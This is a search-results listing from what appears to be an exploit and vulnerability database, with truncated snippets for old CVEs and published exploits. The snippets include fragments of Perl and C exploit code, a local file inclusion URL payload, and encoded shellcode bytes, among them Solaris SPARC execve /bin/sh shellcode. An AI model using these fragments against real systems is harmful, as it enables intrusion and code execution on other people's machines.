482 matches found
Stack overflow
Stack-based buffer overflow in the ctags parsing code in Programmer's Notepad before 2.0.8.718 allows user-assisted remote attackers to cause a denial of service application crash or execute arbitrary code via a crafted .c file, when the victim selects the Jump To dialog. NOTE: some of these...
CVE-2008-1210
Stack-based buffer overflow in the ctags parsing code in Programmer's Notepad before 2.0.8.718 allows user-assisted remote attackers to cause a denial of service application crash or execute arbitrary code via a crafted .c file, when the victim selects the Jump To dialog. NOTE: some of these...
CVE-2008-0103
Unspecified vulnerability in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP2, and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Office document that contains a malformed object, related to a "memory handling error," aka "Microsoft Office Execution Jump...
Microsoft Visual InterDev 6.0 SP6 - .sln Local Buffer Overflow
Microsoft Visual InterDev 6.0 SP6 - .sln Local Buffer Overflow usage: exploit.py FileName import sys print "------------------------------------------------------------------------" print ' Microsoft Visual InterDev 6.0 SP6 ".sln" files Local Buffer Overflow' print " author: shinnai" print " mail...
iSupport v1.8 Local file include vulnerability
iSupport v1.8 Local file Inclusion Vuln found by JuMp-Er http://www.ahc-security.org Script Name : iSupport version : 1.8 Vendor Site : http://www.idevspot.com/iSupport.php Exploit : http://www.site.com/iSupport/index.php?includefile=local file 3 StRoNiX, mawena, ML, n0th1ng...
isupport-lfi.txt
iSupport v1.8 Local file Inclusion Vuln found by JuMp-Er http://www.ahc-security.org Script Name : iSupport version : 1.8 Vendor Site : http://www.idevspot.com/iSupport.php Exploit : http://www.site.com/iSupport/index.php?includefile=local file 3 StRoNiX, mawena, ML, n0th1ng...
Microsoft Jet数据库引擎MDB文件解析远程缓冲区溢出漏洞
Microsoft Jet DataBase Engine是一款Access数据库引擎。 Microsoft Jet数据库引擎处理MDB文件时存在缓冲区溢出,远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。 当Microsoft Office Access解析MDB文件时,会调用Jet Engine msjet40.dll来解析它,通过构建恶意的MDB,会触发一个栈的缓冲区溢出: C:\\Windows\\System32\\msjet40.dll, version is 4.0.8618.0 .text:1B0B72BB mov ecx, edx ; ecx=0x5200...
CVE-2007-3510.pl.txt
!perl "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit Author: Manuel Santamarina Suarez e-Mail: [email protected] use IO::Socket; use File::Basename; destination TCP port $port = 143; SE handler You can only use HEX values from 0x20 to 0x7e! printable ASCII characters You must use a...
IBM Lotus Domino 7.0.2FP1 - IMAP4 Server LSUB Command
!perl "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit Author: Manuel Santamarina Suarez e-Mail: [email protected] use IO::Socket; use File::Basename; destination TCP port $port = 143; SE handler You can only use HEX values from 0x20 to 0x7e! printable ASCII characters You must use a...
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
!/usr/bin/perl -w =============================================================================================== 3Com TFTP Service \n\n"; exit; $target = IO::Socket::INET-newProto='udp', PeerAddr=$ARGV0, PeerPort=$ARGV1...
FlashGameScript 1.5.4 - index.php?func Remote File Inclusion
FlashGameScript 1.5.4 - index.php?func Remote File Inclusion / | \ \ \ / \ / \ / \ / / / / \ Y / // \ | | /\ /\ / /| / \ | \ // / / / / -------------------------------------------------------- Author : JuMp-Er Date : feb, 21th 2007 Level : Dangerous contact: : aH-crewathotmaildotcom...
MS Windows 2K POSIX Subsystem Privilege Escalation Exploit (MS04-020)
No description provided by source. / Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit MS04-020 Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED Posixexp.c By bkbll bkbll cnhonker net,bkbll tom com www cnhonker com 2004/07/16 thanks to eyas xfocus org C:\whoami VITUALWIN2K\tes...
eIQnetworks ESA - Syslog Server Remote Buffer Overflow
eIQnetworks ESA - Syslog Server Remote Buffer Overflow !/usr/bin/perl -w http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom - 03/23/2006 Bug found by KF of digitalmunition.com. http://www.zerodayinitiative.com/advisories/ZDI-06-023.html Exploit for Syslog Server by...
eIQnetworks ESA (Syslog Server) Remote Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ============================================================== eIQnetworks ESA Syslog Server Remote Buffer Overflow Exploit ============================================================== !/usr/bin/perl -w http://www.digitalmunition.com...
Microsoft Windows XP2000 - Mrxsmb.sys Local Privilege Escalation (MS06-030)
Microsoft Windows XP2000 - Mrxsmb.sys Local Privilege Escalation MS06-030 /////////////////////////////////////////////////////////////////////////////////////// // Mrxsmb.sys XP & 2K Ring0 Exploit 6/12/2005 // Tested on XP SP2 && 2K SP4 // Disable ReadOnly Memory protection //...
Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp)
No description provided by source. // Two includes. include fstream.h include winsock2.h // Project - Settings - Link Object/Library modules 'Ws232.lib' pragma commentlib, "ws232" char MyShellCode = // XOR by \x99\x99\x99\x99. "\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99"...
IMail IMAP4D Delete Overflow
This module exploits a buffer overflow in the 'DELETE' command of the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14. This module requires Metasploit: https://metasploit.com/download Current source:...
CVE-2005-3649
jumpto.php in Moodle 1.5.2 allows remote attackers to redirect users to other sites via the jump parameter...
solaris/SPARC execve /bin/sh 52 bytes
No description provided by source. //Solaris/Sparc - LSD char shellcode= "\x20\xbf\xff\xff" / bn,a shellcode-4 / "\x20\xbf\xff\xff" / bn,a shellcode / "\x7f\xff\xff\xff" / call shellcode+4 / "\x90\x03\xe0\x20" / add %o7,32,%o0 / "\x92\x02\x20\x10" / add %o0,16,%o1 / "\xc0\x22\x20\x08" / st...
solaris/SPARC execve /bin/sh 52 bytes
solaris/SPARC execve /bin/sh 52 bytes. Shellcode exploit for solarissparc platform //Solaris/Sparc - LSD char shellcode= "\x20\xbf\xff\xff" / bn,a / "\x20\xbf\xff\xff" / bn,a / "\x7f\xff\xff\xff" / call / "\x90\x03\xe0\x20" / add %o7,32,%o0 / "\x92\x02\x20\x10" / add %o0,16,%o1 / "\xc0\x22\x20\x0...